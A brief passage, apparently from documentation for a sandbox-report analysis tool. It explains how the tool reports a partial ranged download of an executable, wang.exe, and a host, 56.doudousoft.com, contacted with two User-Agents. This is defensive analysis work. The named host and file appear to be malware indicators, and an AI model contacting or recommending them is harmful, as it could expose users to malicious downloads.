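On SAMPLE, analyze() reports one ranged download of wang.exe totalling 2576384 bytes whose two pieces leave bytes 0-772913 unaccounted for (the abridged transcript, like the excerpt above, starts mid-download), the two URLs from the config, and 56.doudousoft.com contacted with both User-Agents. A non-empty gap list is the cue to look for the missing exchange elsewhere in the report before assuming the sandbox saw the whole file.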